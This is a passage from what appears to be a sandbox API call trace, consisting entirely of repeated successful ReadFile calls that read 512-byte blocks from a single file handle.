lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.228] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.228] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 
[0128.228] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.228] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.229] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.229] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.229] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.229] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.229] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.229] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.229] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, 
lpOverlapped=0x0) returned 1 [0128.229] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.229] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.229] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.230] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.230] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.230] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.230] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.230] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.230] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, 
lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.230] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.230] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.230] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.231] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.231] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.231] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.231] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.231] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.231] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: 
lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.231] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.231] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.231] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.231] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.232] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.232] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.232] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.232] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.232] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, 
lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.232] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.232] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.232] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.232] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.232] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.232] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.233] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.233] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.233] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.233] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.233] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.233] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.233] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.233] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.233] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.233] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.233] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.233] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.234] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.234] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.234] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.234] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.234] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.234] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.234] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.234] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.234] ReadFile (in: hFile=0x58, 
lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.234] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.234] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.235] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.235] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.235] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.235] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.235] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.235] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.235] ReadFile 
(in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.235] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.236] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.236] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.236] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.236] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.236] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.236] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.236] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 
[0128.236] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.236] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.236] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.237] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.237] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.237] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.237] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.237] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.237] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, 
lpOverlapped=0x0) returned 1 [0128.237] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.237] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.237] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.238] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.238] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.238] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.238] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.238] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.238] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, 
